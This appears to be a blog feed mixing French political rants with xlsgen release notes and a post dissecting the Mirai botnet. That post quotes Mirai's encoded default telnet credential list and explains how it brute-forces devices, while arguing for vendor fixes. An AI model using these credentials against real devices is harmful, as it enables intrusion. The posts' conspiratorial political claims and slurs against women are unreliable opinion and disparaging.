Les émissions disponibles en replay sur les sites des chaînes respectives sont d'une valeur inestimable ces jours-ci, car vous pouvez entendre avec délectation à quel point les soi-disants intellectuels, connaisseurs, éditorialistes et autres personnalités convenues n'ont été en fait que des soutiens objectifs d'une ligne politique, en se faisant passer pour des gens neutres et honnêtes. La réalité dépasse la fiction. Voyez ces gens qui ont été jusqu'à arborer des vêtements bleus, était-ce par amour d'enfance des schtroumpfs ?

La bonne nouvelle c'est que leurs livres vont cesser de se vendre et leurs éditeurs ne rentreront pas dans leur frais. Ils pourraient être moins bankable à l'avenir.

Evidemment, pour eux, il y a aussi une bonne nouvelle, c'est que ce qui s'est passé est toujours effacé par ce qui se passe, et ils comptent sur la mémoire très relative du public pour continuer à se faire passer pour intellectuels, connaisseurs, éditorialistes et autres personnalités propres sur elles. D'ailleurs parmi lesquelles beaucoup de femmes. Cela est un mépris de classe qui ne dit pas son nom. Et un double mépris lorsque ce sont des femmes idiotes utiles d'un système. Il se trouve que tous ces gens font par ailleurs partie de lobbies, pourtant interdits en france car parait-il l'état ne reconnait que l'individu, pas le groupe.

La preuve éclatante que l'ennemi n'est pas le politique mais son intermédiaire, en l'occurence les médias. Méfiance!

L'entreprise Apple est une entreprise d'une grande classe. La preuve :

extrait : "Le constructeur propose désormais des iPhone moins chers sur sa boutique en ligne américaine. Ce sont des exemplaires reconditionnés. (...) Ils s'agit d'exemplaires généralement renvoyés par des clients qui ont rencontré un problème technique ou ont simplement exercé leur droit de rétraction."

Le gueux aura donc droit à l'appareil d'un autre. De quoi se plaint-il encore, déjà qu'il pourra fièrement arborer son logo Apple, que dis-je sa publicité Apple au dos de son appareil ?

Qu'une marque de luxe informatique s'honore de vendre un peu moins cher des appareils d'occasion me trouble un peu. Du point de vue moral bien entendu. Mais aussi d'un point de vue sécurité informatique. Mais bon, qui suis-je moi pour prévenir ces futurs acquéreurs de l'erreur qu'ils font?

Journée anti-trump dans les médias français : Hitler est de retour. On pouvait imaginer une telle propagande, mais voir la chose en action, aussi homogène, aussi complète, c'est quand même hallucinant. Ceci est à montrer dans toutes les écoles. Des infos bidons en temps réel 24 heures sur 24. Surtout lorsque ces faux experts, faux éditorialistes, faux journalistes et faux politiques rivalisent d'hyperbole. Hitler est de retour my friends ! Cachez-vous !!

Une telle attaque visant un type seul, c'est au nom de quoi, et surtout au nom de qui ?

Il faudra, si les premiers résultats sont confirmés, et que Trump finit élu des USA, que mis à part l'incroyable FUCK OFF en direction des médias en particulier occidentaux qui ont été pro-establishment, pro-lobbies, se poser des questions sur tout ce qui touche au big data, à l'intelligence artificielle, etc., car la réalité c'est que ce big FUCK OFF est aussi une démonstration cinglante de la totale fumisterie du big data et de l'intelligence artificielle, dont se servaient l'establishment justement pour expliquer et justifier scientifiquement la victoire de Clinton.

Build 4.0.0.58 of xlsgen adds new capability which is to delete comments or hyperlinks on a mass basis. This capability is exposed both at the worksheet level (so all comments or all hyperlinks in that sheet tab get deleted) and at the range level (only comments or hyperlinks inside the range get deleted).

For an entire worksheet,

workbook->WorksheetByIndex[1]->DeleteHyperlinks();

For a range,

workbook->WorksheetByIndex[1]->NewRange(L"A1:G14")->DeleteComments();

Build 4.0.0.57 of xlsgen fixes how databars are preserved, in particular how one of its property (ShowBarOnly) is preserved in XLSX files. The problem did not occur with XLSB files.

Build 4.0.0.56 of xlsgen adds read/write and calculation support for the hidden function DATEDIF(). Support is added for integrity purposes.

The official Microsoft documentation is here.

Syntax : DATEDIF(start_date ; end_date ; mode)

Calculates the number of days, months, or years between two dates. This function is provided for compatibility with Lotus 1-2-3.

modes :

• "y" : calculates the number of complete years
  
• "m" : calculates the number of complete months
  
• "d" : calculates the number of days
  
• "md" : calculates the number of days, ignoring months and years
  
• "ym" : calculates the number of months
  
• "yd" : calculates the number of days, ignoring months years
  

Build 4.0.0.55 of xlsgen adds /S and /SILENT parameters to the xlsgen.exe command line for registering COM components silently. This is useful, if you are using xlsgen.exe, which is our process isolated version of the engine, for registering it against COM either from a command-line window or from an installer.

So to register xlsgen.exe silently before using it, that would be :

<path>\xlsgen.exe /S /REGSERVER

And to unregister xlsgen.exe,

<path>\xlsgen.exe /S /UNREGSERVER

...got to be the most stupid "innovation" in years, only comparable to Samsung's edge screens on their smartphones.

When you've got no idea on how to improve things, just hire creative types and let them rule your company...

Apple is over. It's amazing some company, whoever they are, does not take the best of Jobs' Apple, namely quality control, and run, ensuring success for years to come.

Build 4.0.0.54 of xlsgen fixes a problem in the calculation engine related to the MATCH() function. The second parameter, which is the range to look for a match, can be a non-area reference. Something that xlsgen did not expect and is now fixed.

Build 4.0.0.53 of xlsgen fixes a problem related to creating group outlines in XLSX and XLSB files. The problem did not reproduce with XLS files.

Group outlines is this mechanism for grouping and then expanding or collapsing a continuous group of rows, or group of columns. Setting the group as collapsed did not work in scenarios where XLSX or XLSB files were being created. This is now fixed.

Sample code (C++) :

xlsgen::IXlsRangePtr range1 = wksht->NewRange(L"R8C3:R10C3");
xlsgen::IXlsOutlinePtr outline = range1->NewOutline();
outline->VerticalOutlineLevel = xlsgen::outline_level1;
outline->VerticalOutlineUpsideDown = TRUE;
outline->VerticalOutlineExpand = FALSE;

Le code du botnet mirai a été mis en ligne (allez voir du côté d'un exégète de l'afnic), et il est vraiment très simple.

En deux temps,

- un ou plusieurs serveurs qui exécutent un script écrit en langage Go (qui se lit aussi facilement que du C) et qui cherche aléatoirement des proies sur internet identifiées par leurs adresses IP.

- à chaque fois, tentative de connection avec privilège maximum via telnet (qui suppose être actif) en utilisant un mot de passe parmi une cinquantaine prédéfinie :

add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
...

- puis, une fois rentré, utilisation du service pour exécuter des commandes HTTP type GET.


On le voit, ce truc qui défraie la chronique depuis maintenant presque un mois n'exploite aucune vulnérabilité de sécurité, mais uniquement la bétise, tellement énorme qu'on se demande si c'est intentionnel, bétise des constructeurs qui vendent des appareils à mettre en ligne en public sur internet avec un accès codé en dur, donc testable par n'importe qui de l'extérieur.

On le voit bien. Il suffirait qu'au bout de 3 échecs de connection avec un mauvais mot de passe l'appareil "attaqué" se bloque pour que le botnet mirai s'asphyxie et meurt lamentablement.

Ou mieux encore, désactiver telnet par défaut. Les constructeurs doivent vendre des produits sans telnet par défaut.

Mais non ça c'est trop demander !!

Ce week-end, Twitter était HS. Renseignement pris, auprès d'un registrar, voici les name servers de twitter :

Name Server: NS1.P34.DYNECT.NET
Name Server: NS2.P34.DYNECT.NET
Name Server: NS3.P34.DYNECT.NET
Name Server: NS4.P34.DYNECT.NET

Les name servers sont les enregistrements servis par tous les serveurs DNS de France et de navarre, dont ceux de Orange, Free et compagnie, et qui font que twitter.com dans un navigateur, ça part chez dynect. Ils pointent tous au même endroit, ce qui s'appelle un SPOF, single point of failure. C'est la b-a-ba du réseau, savoir qu'on ne met jamais tous ses oeufs dans le même panier. Incompétence crasse.

Des arabes qui tuent d'autres arabes avec des armes américaines, russes et européennes, en quoi n'est-ce pas du colonialisme. En quoi n'est-ce pas une simple variante du génocide d'un peuple ?

Et on voit aussi à cette occasion la fumisterie du mythe de l'oumma, la communauté arabe homogène, qui est pourtant l'axiome de tout ce que la France, et l'occident, porte comme idéologie anti-arabe dont les médias se font les portes-voix depuis vingt ans.

Hillary Clinton a d'ailleurs annoncé, dans des propos divulgués par Wikileaks, qu'après les arabes, elle a bien l'intention de s'occuper des chinois ("We are going to ring China").

A bon entendeur...

Arte diffuse pendant encore quelques jours un film français retraçant l'histoire de Charles Ponzi, l'illustre dont on a tiré le nom pour le système de dupe Ponzi, ou chaîne de Ponzi, dans laquelle les nouveaux entrants permettent de payer les intérêts des autres, dans une fuite en avant qui s'arrête forcément un jour. La chaîne dite de Ponzi est une variante de la crédulité du peuple face à l'argent. Ceci est plus que millénaire.

Dans ce monde merveilleux qui se met en place, fait de machine learning, d'intelligence artificielle, d'objets connectés, je conseille quand même, à titre informatif, le visionnage d'un film comme celui d'Adam Curtis "All watched over by machines", que vous trouverez facilement.

Et si cela excite votre curiosité, n'hésitez pas à chercher la filmothèque du bonhomme. Vous ne serez pas déçus.

En principe, soit vous lâchez prise en cours de visionnage, soit vous jetez votre iPhone/android à la poubelle après avoir mis un coup de marteau dessus. Mais surtout votre regard sur la société ne sera plus jamais le même. Pour ceux qui n'ont pas connu ou vu l'oeuvre d'un Guy Debord ou d'un Baudrillard, voici là une occasion de rattraper le temps perdu.

Microsoft annonce une augmentation de son chiffre d'affaires et de ses profits dans le cloud.

Parallèlement les attaques par déni de service se multiplient et montrent, à contrario, qu'investir dans le cloud n'a strictement aucun sens et est même suicidaire pour les entreprises, criminels lorsqu'il s'agit d'administrations compte tenu de ce qui est mis en jeu.

Le gouvernement américain, dénit à Microsoft le droit de pouvoir empêcher l'accès à des données privées extra-territoriales, démontrant par l'exemple que les américains considèrent que la planète entière est soumise à leur loi, dont une partie est secrète, et que par contre les autres pays ne peuvent rien demander en contre partie. Une conséquence est qu'il est criminel dans ces conditions pour une entreprise ou une administration d'engager ses données dans le cloud.

Le gouvernement laisse faire la propagation du cyber-crime en ne poursuivant ni leurs auteurs ni les fabricants de matériels connectés à internet dont la sécurité laisse à désirer (mots de passe par défaut, serveurs qui fonctionnent par défaut, etc.). A force de laisser faire, d'aucuns pourront se demander si le gouvernement américain n'est pas en fait promoteur d'une telle approche. En d'autres termes, qu'en lieu et place de se faire passer pour victime, nous devrions voir ces gens comme la menace principale pour la paix dans le monde.

Méfiance des jeux mobiles et particulièrement sur les smartphones car, comme par hasard, une étude que la plupart des jeux connus (angry birds, ...) cumullent le pire de ce qu'on peut attendre en matière de vie privée, à savoir accès à la localisation, aux réseaux sociaux, au calendrier, aux contacts et aux SMS.

Il va sans dire que je serai la NSA, ou tout autre service gouvernemental, je n'hésiterai pas à me cacher derrière un jeu vidéo particulièrement coloré et agrémenté de pastiches sonores, pour mieux capturer les données des mobiles, y compris des mobiles professionnels qui révèlent ainsi quantité de données confidentielles sur le réseau interne de l'entreprise.

Evidemment, problème, quel employeur peut interdire demain l'utilisation du téléphone portable dans l'enceinte de l'entreprise? Et qui pourrait imposer l'utilisation d'un téléphone à l'ancienne au lieu d'un smartphone pour se prémunir de tous ces problèmes?

On dit qu'un averti en vaut deux...

extrait : "La Commission européenne a lancé mardi un ultimatum à la Belgique pour qu'elle donne vendredi son feu vert au Ceta, traité de libre-échange avec le Canada, lors d'un sommet européen à Bruxelles."

Ultimatum? Ca fait partie du champ lexical de la soumission, non ?

Build 4.0.0.52 of xlsgen adds support for rendering histograms created by Excel 2016 (and by xlsgen).


Histogram rendered by xlsgen (number-based histogram with 4 bins including an overflow bin)

Histograms as defined by Excel 2016 are in fact two histograms depending on whether the data is string-based or number-based.

For strings, histograms group them in categories (strict string match with case sensitivity, etc.), sum up their associated values and show them. It's the equivalent of a stacked bar chart except the fact with stacked charts the visual representation keeps the summed up values separated.

For numbers, histograms automatically or programmatically creates groups known as bins, and associate it with the total of numbers for each bin, i.e. frequency, thereby showing the frequency of each bin. The bin width can be customized, the bin count as well as two special bins, which are the overflow bin and the underflow bin. All of those parameters are optional.

This build also introduced the HistogramByCategory boolean property which allows to manually tell if the histogram is to be written/read/rendered as a string-based histogram or a number-based histogram.

By providing an API for creating and rendering histogram Excel 2016 charts, xlsgen allows such scenarios without Excel 2016 installed on the computer.